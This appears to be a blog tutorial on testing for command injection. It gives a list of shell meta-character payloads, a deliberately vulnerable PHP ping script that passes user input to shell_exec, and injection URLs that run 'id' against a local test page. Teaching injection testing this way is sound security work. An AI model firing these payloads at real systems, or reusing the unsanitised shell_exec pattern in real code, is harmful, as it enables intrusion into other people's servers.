Here are some meta-characters we can use when testing for command injections.
%0aecho $(id) %0d%0aecho $(id) [space]echo $(id) ; echo $(id) '; echo $(id) "; echo $(id) ); echo $(id) | echo $(id) '| echo $(id) "| echo $(id) )| echo $(id) & echo $(id) '& echo $(id) "& echo $(id) )& echo $(id) && echo $(id) '&& echo $(id) "&& echo $(id) )&& echo $(id) %0a echo $(id) '%0a echo $(id) "%0a echo $(id) )%0a echo $(id) %0d%0aecho $(id) '%0d%0aecho $(id) "%0d%0aecho $(id) )%0d%0aecho $(id)
Basic Command Injection
Here we have the first command injection. Its simple enough, it takes an ip address and pings it and returns the output. The php code for the command injection is as follows.
<?php
print "<pre>".shell_exec("ping -c 5 ".$_GET['c'])."</pre>"
?>
We first try a characters to see if we can get command execution through CRLF line breaks.
http://127.0.0.1/~sam/c.php?c=127.0.0.1%0aecho%20$(id)
As you can see we got successful code execution from using a '%0a' LINE FEED character. Lets try with both CARRIAGE RETURN and LINE FEED
http://127.0.0.1/~sam/c.php?c=127.0.0.1%0d%0aecho%20$(id)
We got execution with it also. Many people do not try these characters when testing for command execution but that are well worth the try,
Next we move on to the other characters we can use for command injection.
http://127.0.0.1/~sam/c.php?c=127.0.0.1;echo $(id)
As you can see we got successful command execution with the ';' character.
http://127.0.0.1/~sam/c.php?c=127.0.0.1|echo $(id)
And we got execution with the '|' character.
Single Quote Command Injection
Sometimes the injection is not as straightforward as you would like. For instance the use of quotes both single and double quotes can arise. Lets test some strings out to see if we can get a successful command execution.
http://127.0.0.1/~sam/c.php?c=127.0.0.1';echo $(id)'
The string '; works and we get command execution.
http://127.0.0.1/~sam/c.php?c=127.0.0.1%27|echo $(id)'
The pipe character also works in this command injection.
http://127.0.0.1/~sam/c.php?c=127.0.0.1%27%0aecho $(id)'
LINE FEED also works.
http://127.0.0.1/~sam/c.php?c=127.0.0.1%27%0d%0aecho $(id)'
So does CRLF.
Double Quote Command Injection
Just like single quote injection, double quote injection can be a pain in the neck sometimes.
http://127.0.0.1/~sam/c.php?c=127.0.0.1";echo $(id)"
Semi-colon works with this injection
http://127.0.0.1/~sam/c.php?c=127.0.0.1"|echo $(id)"
and so does the pipe character
http://127.0.0.1/~sam/c.php?c=127.0.0.1"%0aecho $(id)"
LINE FEED works.
http://127.0.0.1/~sam/c.php?c=127.0.0.1"%0d%0aecho $(id)"
And so does CRLF.
Parenthesis Command Injection
Sometimes you might come up on a command injection that uses the ')' character as the delimeter.
http://127.0.0.1/~sam/c.php?c=edads)$(id
As you can see we got the id parameter of the command.
No comments:
Post a Comment